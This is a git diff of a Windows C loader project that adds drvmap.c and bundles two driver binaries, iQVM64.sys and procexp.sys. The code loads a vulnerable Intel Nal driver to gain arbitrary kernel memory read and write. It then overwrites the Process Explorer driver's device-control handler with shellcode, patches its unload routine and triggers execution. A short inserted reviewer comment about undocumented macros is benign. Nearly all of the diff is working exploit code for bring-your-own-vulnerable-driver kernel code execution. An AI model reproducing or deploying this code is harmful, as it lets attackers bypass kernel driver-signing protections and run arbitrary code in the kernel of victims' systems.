RtlSecureZeroMemory(szFile, sizeof(szFile)); - cch = GetCurrentDirectory(MAX_PATH, szFile); - if ((cch != 0) && (cch < MAX_PATH)) { - _strcat(szFile, TEXT("\\")); - _strcat(szFile, TSUGUMI_DRV_NAME); - - _strcpy(szLog, TEXT("Ldr: Loading Tsugumi Monitor -> ")); - _strcat(szLog, szFile); - cuiPrintText(szLog, TRUE); - - scmInstallDriver(schSCManager, TSUGUMI_DISP_NAME, szFile); - bResult = scmStartDriver(schSCManager, TSUGUMI_DISP_NAME); - } - - } while (bCond); - - if (schSCManager != NULL) - CloseServiceHandle(schSCManager); - - return bResult; -} - -/* -* supRestartVBoxDrv -* -* Purpose: -* -* Start VBoxDrv if stopped. 
-* -*/ -BOOL supRestartVBoxDrv( - _Out_ PULONG lastErrorValue -) -{ - BOOL bResult = FALSE; - SC_HANDLE Manager; - SC_HANDLE Service; - - SERVICE_STATUS_PROCESS Status; - ULONG dummy, lasterror; - - // - // Assume failure. - // - if (lastErrorValue) - *lastErrorValue = ERROR_UNHANDLED_ERROR; - - Manager = OpenSCManager( - NULL, - NULL, - SC_MANAGER_ALL_ACCESS); - - if (Manager) { - - Service = OpenService( - Manager, - TEXT("VBoxDrv"), - SERVICE_ALL_ACCESS); - - if (Service) { - - if (QueryServiceStatusEx( - Service, - SC_STATUS_PROCESS_INFO, - (LPBYTE)&Status, - sizeof(Status), - &dummy)) - { - if (Status.dwCurrentState == SERVICE_STOPPED) { - - bResult = StartService(Service, 0, NULL); - lasterror = GetLastError(); - - } - else { - // - // Driver already running or in pending state, nothing to do. - // - bResult = TRUE; - lasterror = ERROR_SUCCESS; - } - } - else { - if (lastErrorValue) - *lastErrorValue = GetLastError(); - } - - CloseServiceHandle(Service); - } - else { - if (lastErrorValue) - *lastErrorValue = GetLastError(); - } - CloseServiceHandle(Manager); - } - else { - if (lastErrorValue) - *lastErrorValue = GetLastError(); - } - - return bResult; -} - diff --git a/Source/Zekamashi/loader/sup.h b/Source/Zekamashi/loader/sup.h deleted file mode 100644 index 731fcd3..0000000 --- a/Source/Zekamashi/loader/sup.h +++ /dev/null 
@@ -1,37 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2019
-*
-* TITLE: SUP.H
-*
-* VERSION: 1.100
-*
-* DATE: 04 Jan 2019
-*
-* Common header file for the program support routines.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-BOOL supEnablePrivilege(
- _In_ DWORD PrivilegeName,
- _In_ BOOL fEnable);
-
-VOID supPurgeSystemCache(
- VOID);
-
-PVOID supGetSystemInfo(
- _In_ SYSTEM_INFORMATION_CLASS InfoClass);
-
-BOOL supProcessExist(
- _In_ LPWSTR lpProcessName);
-
-BOOL supLoadDeviceDriver(
- VOID);
-
-BOOL supRestartVBoxDrv(
- _Out_ PULONG lastErrorValue);
diff --git a/Source/Zekamashi/Zekamashi.sln b/Source/Zekamashi_v2/Zekamashi.sln
similarity index 66%
rename from Source/Zekamashi/Zekamashi.sln
rename to Source/Zekamashi_v2/Zekamashi.sln
index 906734f..e7a9e3a 100644
--- a/Source/Zekamashi/Zekamashi.sln
+++ b/Source/Zekamashi_v2/Zekamashi.sln
@@ -1,7 +1,7 @@
 Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 15
-VisualStudioVersion = 15.0.28307.168
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29709.97
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "loader\loader.vcxproj", "{2AFB187B-63FB-40C6-B54C-38D559E5124C}"
EndProject
@@ -9,18 +9,12 @@ Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Release|x64 = Release|x64
- ReleaseForSigned|x64 = ReleaseForSigned|x64
- ReleaseSigned|x64 = ReleaseSigned|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Debug|x64.ActiveCfg = Debug|x64
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Debug|x64.Build.0 = Debug|x64
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Release|x64.ActiveCfg = Release|x64
{2AFB187B-63FB-40C6-B54C-38D559E5124C}.Release|x64.Build.0 = Release|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseForSigned|x64.ActiveCfg = ReleaseForSigned|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseForSigned|x64.Build.0 = ReleaseForSigned|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseSigned|x64.ActiveCfg = ReleaseSigned|x64
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}.ReleaseSigned|x64.Build.0 = ReleaseSigned|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
diff --git a/Source/Tsugumi/Resource.rc b/Source/Zekamashi_v2/loader/Resource.rc
similarity index 82%
rename from Source/Tsugumi/Resource.rc
rename to Source/Zekamashi_v2/loader/Resource.rc
index 0357ebd..58845fc 100644
Binary files a/Source/Tsugumi/Resource.rc and b/Source/Zekamashi_v2/loader/Resource.rc differ
diff --git a/Source/Zekamashi_v2/loader/consts.h b/Source/Zekamashi_v2/loader/consts.h
new file mode 100644
index 0000000..0550e12
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/consts.h
@@ -0,0 +1,25 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: CONSTS.H
+*
+* VERSION: 1.00
+*
+* DATE: 07 Jan 2020
+*
+* Global consts.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define NT_REG_PREP L"\\Registry\\Machine"
+#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
+
+#define PROCEXP152 L"PROCEXP152"
\ No newline at end of file
diff --git a/Source/Zekamashi_v2/loader/drv/iQVM64.sys b/Source/Zekamashi_v2/loader/drv/iQVM64.sys
new file mode 100644
index 0000000..2038071
Binary files /dev/null and b/Source/Zekamashi_v2/loader/drv/iQVM64.sys differ
diff --git a/Source/Zekamashi_v2/loader/drv/procexp.sys b/Source/Zekamashi_v2/loader/drv/procexp.sys
new file mode 100644
index 0000000..19b9a82
Binary files /dev/null and b/Source/Zekamashi_v2/loader/drv/procexp.sys differ
diff --git a/Source/Zekamashi_v2/loader/drvmap.c b/Source/Zekamashi_v2/loader/drvmap.c
new file mode 100644
index 0000000..afdbfb5
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/drvmap.c
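Review bot: The three macros added in consts.h are undocumented, and the file is committed without a trailing newline (the hunk ends with `\ No newline at end of file`). NT_REG_PREP and DRIVER_REGKEY are a registry root and a format string that other code will combine, so each should state what it expects: above `NT_REG_PREP` I'd add `// NT-native registry root (\Registry\Machine, i.e. HKLM), presumably the first DRIVER_REGKEY argument`, above `DRIVER_REGKEY` `// Format for a driver service key; the two %wS placeholders take wide strings: a registry root, then the service name`, and above `PROCEXP152` `// Service/device name; presumably matches the bundled drv/procexp.sys added in this commit — confirm against the caller`. Adding the final newline also keeps the no-newline marker out of every later diff of this header.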
@@ -0,0 +1,832 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2020 +* +* TITLE: DRVMAP.C +* +* VERSION: 1.00 +* +* DATE: 24 Jan 2020 +* +* Driver mapping routines. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include "global.h" +#include "tsmisc.h" + +#define PROVIDER_NAME L"IntelNal" +#define PROVIDER_DEVICE L"Nal" + + +PMAPPED_CODE_DATA g_MappedData; + +/* +* QueryDriverUnloadOffset +* +* Purpose: +* +* Return offset to the DriverUnload procedure in TSMI shellcode. +* +*/ +ULONG QueryDriverUnloadOffset( + _In_ PBYTE ShellcodePtr, + _In_ ULONG ShellCodeSize +) +{ + ULONG length = 0, offset = 0; + PUCHAR pOpcode; + hde64s hs; + + __try { + + // + // Calculate next procedure offset. + // + do { + pOpcode = (UCHAR*)RtlOffsetToPointer(ShellcodePtr, offset); + hde64_disasm(pOpcode, &hs); + if (hs.flags & F_ERROR) { + offset = 0; + break; + } + + length = hs.len; + offset += length; + + // + // End of function found. + // + if ((length == 1) && (*pOpcode == 0xC3)) { + + // + // Skip padding bytes if present. + // + do { + pOpcode = (UCHAR*)RtlOffsetToPointer(ShellcodePtr, offset); + hde64_disasm(pOpcode, &hs); + if (hs.flags & F_ERROR) { + offset = 0; + break; + } + + if ((hs.len == 1) && (*pOpcode == 0xCC)) + offset += hs.len; + + } while (*pOpcode == 0xCC); + + break; + } + + } while (offset < ShellCodeSize); + + } + __except (EXCEPTION_EXECUTE_HANDLER) { + return 0; + } + return offset; +} + +/* +* VirtualToPhysical +* +* Purpose: +* +* Provider wrapper for VirtualToPhysical routine. 
+* +*/ +BOOL WINAPI VirtualToPhysical( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_ ULONG_PTR* PhysicalAddress) +{ + return NalVirtualToPhysical(DeviceHandle, + VirtualAddress, + PhysicalAddress); +} + +/* +* ReadKernelVM +* +* Purpose: +* +* Provider wrapper for ReadKernelVM routine. +* +*/ +BOOL WINAPI ReadKernelVM( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR Address, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + if (Address < g_MaximumUserModeAddress) { + SetLastError(ERROR_INVALID_PARAMETER); + return FALSE; + } + + return NalReadVirtualMemoryEx(DeviceHandle, + Address, + Buffer, + NumberOfBytes); +} + +/* +* WriteKernelVM +* +* Purpose: +* +* Provider wrapper for WriteKernelVM routine. +* +*/ +BOOL WINAPI WriteKernelVM( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR Address, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + if (Address < g_MaximumUserModeAddress) { + SetLastError(ERROR_INVALID_PARAMETER); + return FALSE; + } + + return NalWriteVirtualMemoryEx(DeviceHandle, + Address, + Buffer, + NumberOfBytes); +} + +/* +* CheckMemoryLayout +* +* Purpose: +* +* Check if shellcode can be placed within the same/next physical page(s). +* +*/ +BOOL CheckMemoryLayout( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR TargetAddress, + _In_ ULONG SizeOfShell +) +{ + ULONG_PTR memPage, physAddrStart, physAddrEnd; + + memPage = (TargetAddress & 0xfffffffffffff000ull); + + if (VirtualToPhysical(DeviceHandle, + memPage, + &physAddrStart)) + { + memPage = (TargetAddress + SizeOfShell) & 0xfffffffffffff000ull; + + if (VirtualToPhysical(DeviceHandle, + memPage, + &physAddrEnd)) + { + ULONG_PTR diffAddr = physAddrEnd - physAddrStart; + + if (diffAddr > PAGE_SIZE) + return FALSE; + else + return TRUE; + } + + } + return FALSE; +} + + +/* +* StartVulnerableDriver +* +* Purpose: +* +* Load vulnerable driver and return handle for it device or NULL in case of error. 
+* +*/ +HANDLE StartVulnerableDriver( + _In_ ULONG uResourceId, + _In_ HINSTANCE hInstance, + _In_ LPWSTR lpDriverName, + _In_ LPWSTR lpDeviceName, + _In_ LPWSTR lpFullFileName +) +{ + BOOL bLoaded = FALSE; + PBYTE drvBuffer; + NTSTATUS ntStatus; + ULONG resourceSize = 0; + HANDLE deviceHandle = NULL; + + printf_s("[>] Entering %s\r\n", __FUNCTION__); + + // + // Check if driver already loaded. + // + if (supIsObjectExists((LPWSTR)L"\\Device", lpDeviceName)) { + printf_s("[!] Vulnerable driver already loaded\r\n"); + bLoaded = TRUE; + } + else { + + // + // Driver is not loaded, load it. + // + + drvBuffer = supQueryResourceData(uResourceId, hInstance, &resourceSize); + if (drvBuffer == NULL) { + printf_s("[!] Driver resource id not found %lu\r\n", uResourceId); + return NULL; + } + + if (resourceSize != (ULONG)supWriteBufferToFile(lpFullFileName, + drvBuffer, + resourceSize, + TRUE, + FALSE, + &ntStatus)) + { + printf_s("[!] Unable to extract vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus); + return NULL; + } + + ntStatus = supLoadDriver(lpDriverName, lpFullFileName, FALSE); + if (NT_SUCCESS(ntStatus)) { + printf_s("LDR: Vulnerable driver \"%ws\" loaded\r\n", lpDriverName); + bLoaded = TRUE; + } + else { + printf_s("[!] Unable to load vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus); + DeleteFile(lpFullFileName); + } + } + + if (bLoaded) { + ntStatus = supOpenDriver(lpDeviceName, &deviceHandle); + if (!NT_SUCCESS(ntStatus)) + printf_s("[!] Unable to open vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus); + else + printf_s("LDR: Vulnerable driver opened\r\n"); + } + + printf_s("[<] Leaving %s\r\n", __FUNCTION__); + + return deviceHandle; +} + +/* +* StopVulnerableDriver +* +* Purpose: +* +* Unload previously loaded vulnerable driver. 
+* +*/ +void StopVulnerableDriver( + _In_ LPWSTR lpDriverName, + _In_opt_ LPWSTR lpFullFileName +) +{ + NTSTATUS ntStatus; + + printf_s("[>] Entering %s\r\n", __FUNCTION__); + + ntStatus = supUnloadDriver(lpDriverName, TRUE); + if (!NT_SUCCESS(ntStatus)) { + printf_s("[!] Unable to unload vulnerable driver, NTSTATUS (0x%lX)\r\n", ntStatus); + } + else { + + printf_s("LDR: Vulnerable driver unloaded\r\n"); + ULONG retryCount = 3; + + if (lpFullFileName) { + do { + Sleep(1000); + if (DeleteFile(lpFullFileName)) { + printf_s("LDR: Vulnerable driver file removed\r\n"); + break; + } + + retryCount--; + + } while (retryCount); + } + } + + printf_s("[<] Leaving %s\r\n", __FUNCTION__); +} + +/* +* ProviderCreate +* +* Purpose: +* +* Load vulnerable driver and return it device handle and filename. +* +*/ +BOOL ProviderCreate( + _Out_ HANDLE* DeviceHandle, + _Out_ LPWSTR* DriverFileName) +{ + BOOL bResult = FALSE; + HANDLE deviceHandle = NULL; + HINSTANCE hInstance = GetModuleHandle(NULL); + LPWSTR driverFileName; + + *DeviceHandle = NULL; + *DriverFileName = NULL; + + printf_s("[>] Entering %s\r\n", __FUNCTION__); + + do { + + PUNICODE_STRING CurrentDirectory = &NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath; + SIZE_T length = 64 + + (_strlen(PROVIDER_NAME) * sizeof(WCHAR)) + + CurrentDirectory->Length; + + // + // Build filename for vulnerable driver. + // + driverFileName = (LPWSTR)supHeapAlloc(length); + if (driverFileName == NULL) { + printf_s("[!] Could not allocate memory for driver name, error %lu\r\n", GetLastError()); + break; + } + + length = CurrentDirectory->Length / sizeof(WCHAR); + + _strncpy(driverFileName, + length, + CurrentDirectory->Buffer, + length); + + _strcat(driverFileName, TEXT("\\")); + _strcat(driverFileName, PROVIDER_NAME); + _strcat(driverFileName, TEXT(".sys")); + + // + // Install and run vulnerable driver. 
+ // + deviceHandle = StartVulnerableDriver(IDR_iQVM64, + hInstance, + PROVIDER_NAME, + PROVIDER_DEVICE, + driverFileName); + + *DeviceHandle = deviceHandle; + *DriverFileName = driverFileName; + + bResult = TRUE; + + } while (FALSE); + + printf_s("[<] Leaving %s\r\n", __FUNCTION__); + + return bResult; +} + +/* +* ProviderRelease +* +* Purpose: +* +* Unload vulnerable driver and free resources. +* +*/ +VOID ProviderRelease( + _In_ HANDLE DeviceHandle, + _In_ LPWSTR DriverFileName) +{ + printf_s("[>] Entering %s\r\n", __FUNCTION__); + + if (DeviceHandle) { + CloseHandle(DeviceHandle); + StopVulnerableDriver(PROVIDER_NAME, DriverFileName); + + if (DriverFileName) + supHeapFree(DriverFileName); + } + + printf_s("[<] Leaving %s\r\n", __FUNCTION__); +} + +PVOID ResolveFunction( + _In_ ULONG_PTR KernelBase, + _In_ ULONG_PTR KernelImage, + _In_ LPCSTR Function) +{ + ULONG_PTR Address = supGetProcAddress(KernelBase, KernelImage, Function); + if (Address == 0) { + printf_s("[!] Error, %s address not found\r\n", Function); + return 0; + } + + printf_s("LDR: %s 0x%llX\r\n", Function, Address); + return (PVOID)Address; +} + +#define ASSERT_RESOLVED_FUNC(FunctionPtr) { if (FunctionPtr == 0) break; } + +/* +* SetupShellCode +* +* Purpose: +* +* Create and fill shellcode with data. +* +*/ +BOOL SetupShellCode( + _In_ PTABLE_DESC ConfigurationData) +{ + BOOL bResult = FALSE; + NTSTATUS ntStatus; + UNICODE_STRING ustr; + + ULONG_PTR KernelBase, KernelImage = 0; + + WCHAR szNtOs[MAX_PATH * 2]; + + printf_s("[>] Entering %s\r\n", __FUNCTION__); + + do { + + KernelBase = supGetNtOsBase(); + if (KernelBase == 0) { + printf_s("[!] 
Cannot query ntoskrnl loaded base, abort\r\n"); + break; + } + + printf_s("LDR: Loaded ntoskrnl base 0x%llX\r\n", KernelBase); + + // + // Preload ntoskrnl.exe + // + _strcpy(szNtOs, USER_SHARED_DATA->NtSystemRoot); + _strcat(szNtOs, L"\\system32\\ntoskrnl.exe"); + + RtlInitUnicodeString(&ustr, szNtOs); + ntStatus = LdrLoadDll(NULL, NULL, &ustr, (PVOID*)&KernelImage); + + if ((!NT_SUCCESS(ntStatus)) || (KernelImage == 0)) { + printf_s("[!] Error while loading ntoskrnl.exe, NTSTATUS (0x%lX)\r\n", ntStatus); + break; + } + + printf_s("LDR: Ntoskrnl.exe mapped at 0x%llX\r\n", KernelImage); + + // + // Allocate shellcode. + // + g_MappedData = (PMAPPED_CODE_DATA)VirtualAlloc(NULL, sizeof(MAPPED_CODE_DATA), + MEM_RESERVE | MEM_COMMIT, + PAGE_EXECUTE_READWRITE); + + if (g_MappedData == NULL) + break; + + // + // Remember function pointers. + // + + g_MappedData->_wcsnicmp = + ResolveFunction(KernelBase, KernelImage, "_wcsnicmp"); + ASSERT_RESOLVED_FUNC(g_MappedData->_wcsnicmp); + + g_MappedData->IoAllocateMdl = + ResolveFunction(KernelBase, KernelImage, "IoAllocateMdl"); + ASSERT_RESOLVED_FUNC(g_MappedData->IoAllocateMdl); + + g_MappedData->IofCompleteRequest = + ResolveFunction(KernelBase, KernelImage, "IofCompleteRequest"); + ASSERT_RESOLVED_FUNC(g_MappedData->IofCompleteRequest); + + g_MappedData->IoFreeMdl = + ResolveFunction(KernelBase, KernelImage, "IoFreeMdl"); + ASSERT_RESOLVED_FUNC(g_MappedData->IoFreeMdl); + + g_MappedData->PsGetCurrentProcessId = + ResolveFunction(KernelBase, KernelImage, "PsGetCurrentProcessId"); + ASSERT_RESOLVED_FUNC(g_MappedData->PsGetCurrentProcessId); + + g_MappedData->PsSetLoadImageNotifyRoutine = + ResolveFunction(KernelBase, KernelImage, "PsSetLoadImageNotifyRoutine"); + ASSERT_RESOLVED_FUNC(g_MappedData->PsSetLoadImageNotifyRoutine); + + g_MappedData->MmProtectMdlSystemAddress = + ResolveFunction(KernelBase, KernelImage, "MmProtectMdlSystemAddress"); + ASSERT_RESOLVED_FUNC(g_MappedData->MmProtectMdlSystemAddress); + + 
g_MappedData->MmUnmapLockedPages = + ResolveFunction(KernelBase, KernelImage, "MmUnmapLockedPages"); + ASSERT_RESOLVED_FUNC(g_MappedData->MmUnmapLockedPages); + + g_MappedData->MmUnlockPages = + ResolveFunction(KernelBase, KernelImage, "MmUnlockPages"); + ASSERT_RESOLVED_FUNC(g_MappedData->MmUnlockPages); + + g_MappedData->MmProbeAndLockPages = + ResolveFunction(KernelBase, KernelImage, "MmProbeAndLockPages"); + ASSERT_RESOLVED_FUNC(g_MappedData->MmProbeAndLockPages); + + g_MappedData->MmMapLockedPagesSpecifyCache = + ResolveFunction(KernelBase, KernelImage, "MmMapLockedPagesSpecifyCache"); + ASSERT_RESOLVED_FUNC(g_MappedData->MmMapLockedPagesSpecifyCache); + + g_MappedData->KeDelayExecutionThread = + ResolveFunction(KernelBase, KernelImage, "KeDelayExecutionThread"); + ASSERT_RESOLVED_FUNC(g_MappedData->KeDelayExecutionThread); + + g_MappedData->PsRemoveLoadImageNotifyRoutine = + ResolveFunction(KernelBase, KernelImage, "PsRemoveLoadImageNotifyRoutine"); + ASSERT_RESOLVED_FUNC(g_MappedData->PsRemoveLoadImageNotifyRoutine); + + g_MappedData->IoDeleteSymbolicLink = + ResolveFunction(KernelBase, KernelImage, "IoDeleteSymbolicLink"); + ASSERT_RESOLVED_FUNC(g_MappedData->IoDeleteSymbolicLink); + + g_MappedData->IoDeleteDevice = + ResolveFunction(KernelBase, KernelImage, "IoDeleteDevice"); + ASSERT_RESOLVED_FUNC(g_MappedData->IoDeleteDevice); + + g_MappedData->RtlInitUnicodeString = + ResolveFunction(KernelBase, KernelImage, "RtlInitUnicodeString"); + ASSERT_RESOLVED_FUNC(g_MappedData->RtlInitUnicodeString); + + g_MappedData->ConfigurationDataSize = ConfigurationData->DDTableSize; + RtlCopyMemory(&g_MappedData->ConfigurationData, + ConfigurationData->DDTablePointer, + ConfigurationData->DDTableSize); + + bResult = TRUE; + + } while (FALSE); + + printf_s("[<] Leaving %s\r\n", __FUNCTION__); + + return bResult; +} + +/* +* MapTsugumi +* +* Purpose: +* +* Load and run shellcode inside victim driver using vulnerable driver. 
+* +*/ +BOOL MapTsugumi( + _In_ PTABLE_DESC ConfigurationData +) +{ + BOOL bResult = FALSE, bSuccess = FALSE; + ULONG_PTR objectAddress, IRPHandlerAddress = 0, DataSectionAddress = 0; + HANDLE providerHandle = NULL; + HANDLE victimHandle = NULL; + HINSTANCE hInstance = GetModuleHandle(NULL); + LPWSTR driverFileName = NULL; + + PIMAGE_DOS_HEADER hdrDriver = NULL; + PIMAGE_NT_HEADERS64 pehdr; + PIMAGE_SECTION_HEADER sections; + ULONG c; + LONG32 JMP_Offset; + BYTE JMP_Instruction[16] = { + 0xe9, 0, 0, 0, 0, 0xcc, 0xcc, 0xcc, + 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc + }; + + printf_s("[>] Entering %s\r\n", __FUNCTION__); + + if (!ProviderCreate(&providerHandle, &driverFileName)) { + printf_s("[!] ProviderCreate failed, abort\r\n"); + return FALSE; + } + + ULONG retryCount = 1, maxRetry = 3; + + FILE_OBJECT fileObject; + DEVICE_OBJECT deviceObject; + DRIVER_OBJECT driverObject; + +Reload: + + printf_s("LDR: Victim driver map attempt %lu of %lu\r\n", retryCount, maxRetry); + RtlSecureZeroMemory(&driverObject, sizeof(driverObject)); + + // + // If this is reload, release victim. + // + if (victimHandle) { + NtClose(victimHandle); + victimHandle = NULL; + VictimRelease((LPWSTR)PROCEXP152); + } + + if (VictimCreate(hInstance, + (LPWSTR)PROCEXP152, + IDR_PROCEXP, + &victimHandle)) + { + printf_s("LDR: Victim driver loaded, handle 0x%p\r\n", victimHandle); + } + else { + printf_s("LDR: Could not load victim driver, GetLastError %lu\r\n", GetLastError()); + } + + if (supQueryObjectFromHandle(victimHandle, &objectAddress)) { + + do { + + RtlSecureZeroMemory(&fileObject, sizeof(fileObject)); + + printf_s("LDR: Reading FILE_OBJECT at 0x%llX\r\n", objectAddress); + + if (!ReadKernelVM(providerHandle, + objectAddress, + &fileObject, + sizeof(FILE_OBJECT))) + { + printf_s("[!] 
Could not read FILE_OBJECT at 0x%llX\r\n", objectAddress); + break; + } + + printf_s("LDR: Reading DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject); + + RtlSecureZeroMemory(&deviceObject, sizeof(deviceObject)); + + if (!ReadKernelVM(providerHandle, + (ULONG_PTR)fileObject.DeviceObject, + &deviceObject, + sizeof(DEVICE_OBJECT))) + { + printf_s("[!] Could not read DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject); + break; + } + + printf_s("LDR: Reading DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject); + + if (!ReadKernelVM(providerHandle, + (ULONG_PTR)deviceObject.DriverObject, + &driverObject, + sizeof(DRIVER_OBJECT))) + { + printf_s("[!] Could not read DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject); + break; + } + + hdrDriver = VirtualAlloc(NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!hdrDriver) { + printf_s("[!] Memory allocation error, GetLastError %lu.\r\n", GetLastError()); + break; + } + + if (!ReadKernelVM(providerHandle, + (ULONG_PTR)driverObject.DriverStart, + hdrDriver, + PAGE_SIZE)) + { + printf_s("[!] Could not read driver image header at 0x%p\r\n", driverObject.DriverStart); + break; + } + + pehdr = (PIMAGE_NT_HEADERS64)((ULONG_PTR)hdrDriver + hdrDriver->e_lfanew); + sections = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&pehdr->FileHeader + + sizeof(IMAGE_FILE_HEADER) + pehdr->FileHeader.SizeOfOptionalHeader); + + for (c = 0; c < pehdr->FileHeader.NumberOfSections; ++c) + { + if (_strcmp_a((const char*)sections[c].Name, ".data") == 0) + { + DataSectionAddress = sections[c].VirtualAddress + (ULONG_PTR)driverObject.DriverStart; + } + } + + if (!DataSectionAddress) { + printf_s("[!] 
Could not find data section\r\n"); + break; + } + else { + printf_s("LDR: Victim data section %llX\r\n", DataSectionAddress); + } + + // fixing data pointers in the shellcode + + for (c = 0; c < sizeof(x64kernelcode) - sizeof(ULONG64); ++c) + { + if (*(PULONG64)&x64kernelcode[c] == 0x1337C0DE1CEDC01Aull) + { + *(PULONG64)&x64kernelcode[c] = DataSectionAddress; + } + } + + // + // ProcExp handle no longer needed, can be closed. + // + CloseHandle(victimHandle); + victimHandle = NULL; + + IRPHandlerAddress = (ULONG_PTR)driverObject.MajorFunction[IRP_MJ_DEVICE_CONTROL]; + + // + // Check memory layout. + // + if (!CheckMemoryLayout(providerHandle, IRPHandlerAddress, sizeof(x64kernelcode))) { + + printf_s("[!] Physical address is not within same/next page, reload victim driver\r\n"); + retryCount += 1; + if (retryCount > maxRetry) { + printf_s("[!] Too many reloads, abort\r\n"); + break; + } + goto Reload; + + } + + printf_s("LDR: Victim IRP_MJ_DEVICE_CONTROL 0x%llX\r\n", IRPHandlerAddress); + printf_s("LDR: Victim DriverUnload 0x%p\r\n", driverObject.DriverUnload); + + bSuccess = TRUE; + + } while (FALSE); + + if (hdrDriver) + VirtualFree(hdrDriver, 0, MEM_RELEASE); + } + + // + // Ensure ProcExp handle is closed. + // + if (victimHandle) { + NtClose(victimHandle); + victimHandle = NULL; + } + + // + // Victim loaded successfully. + // + if (bSuccess) { + + if (SetupShellCode(ConfigurationData)) { + + // + // Write shellcode to driver. 
+ // + ULONG UnloadRoutineOffset = QueryDriverUnloadOffset(x64kernelcode, sizeof(x64kernelcode)); + + if (UnloadRoutineOffset) { + + JMP_Offset = (LONG32)(IRPHandlerAddress + UnloadRoutineOffset - (ULONG_PTR)driverObject.DriverUnload - 5); + *(PLONG32)(&JMP_Instruction[1]) = JMP_Offset; + bSuccess = WriteKernelVM(providerHandle, DataSectionAddress, g_MappedData, sizeof(MAPPED_CODE_DATA)); + bSuccess &= WriteKernelVM(providerHandle, IRPHandlerAddress, x64kernelcode, sizeof(x64kernelcode)); + bSuccess &= WriteKernelVM(providerHandle, (ULONG_PTR)driverObject.DriverUnload, JMP_Instruction, sizeof(JMP_Instruction)); + if (bSuccess) + { + printf_s("LDR: Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n"); + + // + // Run shellcode. + // Target has the same handlers for IRP_MJ_CREATE/CLOSE/DEVICE_CONTROL + // + printf_s("LDR: Run shellcode\r\n"); + Sleep(1000); + supOpenDriver((LPWSTR)PROCEXP152, &victimHandle); + Sleep(1000); + bResult = TRUE; + } + else + { + printf_s("[!] Error writing shell code to the target driver, abort\r\n"); + } + } + else { + printf_s("[!] Error calculating shellcode DriverUnload offset\r\n"); + } + } + else { + printf_s("[!] Error while building shellcode, abort\r\n"); + } + } + + ProviderRelease(providerHandle, driverFileName); + + /* + + // + // Unload procexp victim. Used only while debugging. + // + if (VictimRelease((LPWSTR)PROCEXP152)) { + printf_s("LDR: Victim driver unloaded\r\n"); + } + + */ + printf_s("[<] Leaving %s\r\n", __FUNCTION__); + + return bResult; +} diff --git a/Source/Zekamashi_v2/loader/drvmap.h b/Source/Zekamashi_v2/loader/drvmap.h new file mode 100644 index 0000000..71a336a --- /dev/null +++ b/Source/Zekamashi_v2/loader/drvmap.h 
